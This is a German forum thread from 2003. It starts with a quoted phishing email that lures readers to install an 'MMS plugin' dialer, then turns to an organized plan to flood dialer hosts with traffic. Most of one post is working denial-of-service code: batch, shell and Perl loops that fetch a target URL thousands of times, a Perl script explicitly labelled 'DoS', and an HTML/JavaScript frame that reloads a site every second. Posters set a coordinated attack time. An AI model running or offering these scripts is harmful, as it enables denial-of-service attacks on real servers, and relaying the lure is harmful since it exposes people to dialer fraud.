MMS-Warnung - Dialer oder Trojaner drin

B

Brummelchen

Gast
Kam heute an, seid bitte vorsichtig
Return-Path: <MMS_Serviceinfo@lycos.de>
X-Flags: 0000
Delivered-To: GMX delivery to *****
Received: (qmail 32162 invoked by uid 65534); 14 Apr 2003 17:40:52 -0000
Received: from unknown (HELO mail.worldnet.att.net) (200.207.165.236)
by mx0.gmx.net (mx031-rz3) with SMTP; 14 Apr 2003 19:40:52 +0200
Received: from mail.worldnet.att.net [177.184.234.39] (helo=mail.worldnet.att.net)
Reply-To: <MMS_Serviceinfo@lycos.de>
From: "MMS" <MMS_Serviceinfo@lycos.de>
To: "all" <[deleted]>
Subject: MMS Mail Infodienst
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
Date: Mon, 14 Apr 2003 19:40:55 +0200
Message-ID: <20030414174055.32501gmx1@mx031-rz3.gmx.net>
X-GMX-Antivirus: -2 (not scanned, virus scanner disabled)

<center>
Für Sie ist eine MMS ( Multi-Media-Message ) hinterlegt worden !
<center>
<br>
Um diese abzurufen bitte
<center>
<br>
<a href="http://mms_service.tripod.com.br/index.txt?sid=2A11041F0C4507083C520C56415052005A564A190343425E14425C5E45">Hier klicken </a>
<br>
<br>
<center>
Bitte beachten Sie das die Nachricht derzeit nur 48 Std. verfügbar ist . Falls sich die Nachricht nicht automatisch öffnet , müssten Sie unkomplizierterweise unser MMS - Plugin installieren um sich Ihre Nachricht anzuschauen !
<center>
Zum Vergrößern anklicken....

Inhalt dieser Seite im Anhang.
Ich habe keinen blassen Dunst, was das genau ist, soll mir aber recht sein :D
 
Zuletzt bearbeitet:
Hi,

so ein Müll krieg ich fast täglich,

Einfach ignorieren, die Dialer werden immer dreister, man sollte denen den Server zuscheissen.

pogo.d
 
wged für win

Kennt Ihr das UNIX Tool wged, <<CT-Bericht>>,
Sinn dieses Tools ist es diesen Dialer immer wieder downloaded, und so einen haufen Traffic sprich kosten für die Dialeranbieter verursacht,
schade das es soetwas nicht für die Windows Welt giebt, oder doch?
Wiederstand wär machbar Herr Nachtbar.

schönen Abend
thomas
 
Sinn dieses Tools ist es diesen Dialer immer wieder downloaded
Zum Vergrößern anklicken....
Ja du hast Recht thomas, dass könnte unter Linux passieren.

Aber
a) wer startet unbekannte Scripte leichtfertig?
b) Mit Freenet sind das nur 0,53 Euro pro Stunde, und wer die
Traffic-Menge nicht im Auge hat (2., 3. Download), ist selber
doof/schuld.
 
Versteh nix

Hi LX-Ben,

Ich glaub wir verstehen uns miss.

Da es ein solches Programm für Win meines Wissens nicht giebt, ist es müssig über seine Eigenschaften zusprechen.

Ich dachte mir nur folgende vorgehensweise,

ein Prog lädt die Dialer ununterbrochen herunter (dsl flat machts möglich)
- du sollst sie ja nicht installieren, sondern löschen :ROFLMAO:
Natürlich weiss ich das einzellaktionen nichts bringen, aber soetwas über viele Boards hinweg zu Organisieren, müsste ab einem gewissen Grade der verärgerung möglich sein.

gruss
thomas
 
Das Tool heisst wget. Ein Kumpel von mir hat ein Batch-Skript gebastelt, das die gleiche Funktionalität unter Windows bietet. Geht also prinzipiell auch. Wie er es genau gemacht hat weiss ich allerdings nicht. Könnte ihn aber bei Interesse danach fragen.

Im Heise-Forum und zwischenzeitlich bei www.linuxforen.de wurde das eine zeitlang ausgiebig betrieben. Teilweise mit organisierten Aktionen zu bestimmten Uhrzeiten. Da wurden einige spamfreundliche Serverbetreiber "geheist" :D War lustig ;)
 
Original geschrieben von --RAVEN--
Das Tool heisst wget. Ein Kumpel von mir hat ein Batch-Skript gebastelt, das die gleiche Funktionalität unter Windows bietet. Geht also prinzipiell auch. Wie er es genau gemacht hat weiss ich allerdings nicht. Könnte ihn aber bei Interesse danach fragen.

Im Heise-Forum und zwischenzeitlich bei www.linuxforen.de wurde das eine zeitlang ausgiebig betrieben. Teilweise mit organisierten Aktionen zu bestimmten Uhrzeiten. Da wurden einige spamfreundliche Serverbetreiber "geheist" :D War lustig ;)
Zum Vergrößern anklicken....

Das könnten wir doch hier auch mal durchziehen oder?
 
Grundsätzlich eine gute Idee.
Trotzdem denke ich, dass diese Aggressivis sich gegen solche Aktionen auf ihre eigene Art rächen werden. Z. B. durch Weitergabe der IPs an einen gewissen bayrischen Rechtsanwalt. Der wird dann schon was draus tricksen.
Auf solche oder ähnliche Rache sollte man sich im Vorfeld schon einrichten.

Gruß, Delwin :)
 
Alla, ich frag meinen Kumpel mal, ob er das Windows-Skript noch hat.

Problem bei bei der Sache ist es aber einen dafür geeigneten Server zu finden. D.h. einen bei dem die Dialer auch nach einem Hinweis nicht vom Server gelöscht werden. Meist nutzen die Spammer Freespaceanbieter, wo der Dialer eh nur kurz liegt, und da bringt das nix.

Der Thread bei heise.de:
http://www.heise.de/foren/go.shtml?forum_id=33961&list=1&hs=288&e=2566334
(Netmails spamt wie Sau)

Hier der Thread bei den Linuxforen:
http://www.linuxforen.de/forums/showthread.php?s=&threadid=53829

Das Linuxskript gibts direkt hier:
http://www.linuxforen.de/forums/showthread.php?s=&threadid=53829

@Delwin
Was sollen sie dagegen machen? Sie bieten den Dialer zum Download an, und man nutzt das Angebot. Man weiss ja nie wie lange der Dialer noch online ist und schließlich kann man von sowas nie genug haben. Wann gibt es schonmal gecrackte Dialer? ;)
 
@RAVEN:
Nicht direkt auf den Dialer bezogen. Aber die könnten einfach mal so die IPs überprüfen lassen, nach dem Motto: wer Dialer downloaded, saugt auch andere böse Sachen. Und man kann sich kaum dagegen wehren, wenn die den Rechner erst mal gekrallt haben. Das wird dann für den Einzeluser teurer als die paar €€ aus der Portokasse den Dialeranbieter.
Oder kommst Du an einen absolut sicheren Server, der keinen Hinweis auf Deine private Identity weitergibt? Dann stehst Du gleich unter Überwachung von CIA & Co.

Vielleicht wäre ein Pool die Lösung, in dem alle IPs erst mal so durcheinander gewürfelt werden, dass sie nicht mehr verfolgbar sind. So a la JAP

Gruß, Delwin :)
 
Die Lösung mit WGET (aus dem Cosmo-Board) weil dort auch so gedacht wurde vor kurzem :D

WGET hier
http://ftp.sunsite.dk/projects/wget/windows/wget-1.8.2b.zip

Der Batch (Windows)
Code: 
:anfang 
wget [url]http://www.irgendwas-hier-eingeben.dot/datei.ext[/url]
rm datei.ext
GOTO anfang

Für datei.exe und die URL natürlich das richtige eintragen.

Für linux
Code: 
#!/bin/sh 
for i in `seq 1 10000`; 
do 
wget [url]http://www.irgendwas-hier-eingeben.dot/datei.ext[/url]
rm datei.ext
done

Linux2
Code: 
#!/bin/sh 
for i in `seq 1 10000`; 
do 
clear 
echo Durchlauf $i 
wget [url]http://www.irgendwas-hier-eingeben.dot/datei.ext[/url] 
rm screens1.jpg 
done
perl
Code: 
#!/usr/bin/perl -W 
for my $i (1 .. 10000) 
{ 
system('wget -r [url]http://www.irgendwas-hier-eingeben.dot/datei.ext[/url]); 
}

perl2
Code: 
#!/usr/bin/perl -W 
use strict; 
use Digest::MD5 qw(md5_hex); 

print "DoS on [url]http://www.irgendwas-hier-eingeben.dot\n[/url]"; 

use Term::ReadKey; 
#ReadMode 4; # Turn off controls keys 
my $key; 
my $amount; 
while (not defined ($key = ReadKey(-1)) ) 
{ 
$amount++; 
my $id=md5_hex(localtime().rand(10000000)); 
my $id2=md5_hex(localtime().rand(10000000)); 
my $rnnd="edownloads.php?$id=$id2\n"; 

system("wget -q [url]http://www.irgendwas-hier-eingeben.dot/[/url]$rnnd"); 
system("rm $rnnd"); 
print "."; 
} 
print "\n halted. we made $amount requests to the site.\n";

Dann noch in HTML für ein bisschen versteckten Traffic:
Code: 
frame.html 
------------------------------------ 
<html> 
<head> 

<frameset rows="60,*" FRAMESPACING="0" FRAMEPADDING="0"> 
<frame name="header" scrolling="no" noresize target="main" src="frame1.html"> 
<frame name="main" src="http://www.irgendwas-hier-eingeben.dot/"> 
</frameset> 

</html> 

------------------------------------ 

frame1.html 
------------------------------------ 
<SCRIPT LANGUAGE="JAVASCRIPT"> 

function reloader() 
{ 
var i; 
i=10; 

setInterval('parent.main.location.reload()', 1000) 
} 

</SCRIPT> 
</head> 

wenn der reload zu schnell ist, dann den zweiten parameter 
in setInterval von 1000 auf eine hoehere zahl, zb. 5000 stellen. 

<html>

Noch ne Info zu WGET
--delete-after
This option tells Wget to delete every single file it downloads,
after having done so. It is useful for pre-fetching popular pages
through a proxy, e.g.:

wget -r -nd --delete-after http://whatever.com/~popular/page/

The -r option is to retrieve recursively, and -nd to not create
directories.

Note that --delete-after deletes files on the local machine. It
does not issue the DELE command to remote FTP sites, for instance.
Also note that when --delete-after is specified, --convert-links is
ignored, so .orig files are simply not created in the first place.
Zum Vergrößern anklicken....

Haut in die Tasten :devil
 
Original geschrieben von Delwin
Grundsätzlich eine gute Idee.
Trotzdem denke ich, dass diese Aggressivis sich gegen solche Aktionen auf ihre eigene Art rächen werden. Z. B. durch Weitergabe der IPs an einen gewissen bayrischen Rechtsanwalt. Der wird dann schon was draus tricksen.
Auf solche oder ähnliche Rache sollte man sich im Vorfeld schon einrichten.

Gruß, Delwin :)
Zum Vergrößern anklicken....


Warum ich kann doch einen Dialer runterladen solange und sooft ich will oder nicht ????? :ROFLMAO: :ROFLMAO:
 
@Killerkuno:
Klar doch, aber hier geht´s ja ums massenhafte Downloaden, um denen hohe Traffic-Kosten zu verursachen. Da sie Dich deswegen nicht belangen können, wie Du ja selbst sagst, werden die sich was anderes einfallen lassen.
Wie das konkret aussieht, kann man nicht sagen; aber zu denken, dass die ihre Rechnung beim Provider bezahlen und dann ganz lieb damit aufhören, Dialer reinzudrücken, glaubst Du doch auch nicht, oder?

Gruß, Delwin :)
 
Also, jeder der Lust hat, diese Dialer immer und immer wieder unter Windows herunterzuladen, kann dieses mit dem Programm Easy-wget machen.

Ist sogar einfacher als das Linuxproggy
 
Bin dabei.

Wir sollten uns aber schon kurz schliessen.
Ich denke da an gemeinsame Download-Startzeiten sowie Dauer usw.

Wie wäre es mit Sa Abend um 17 Uhr?

Gruss ivi
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
Oben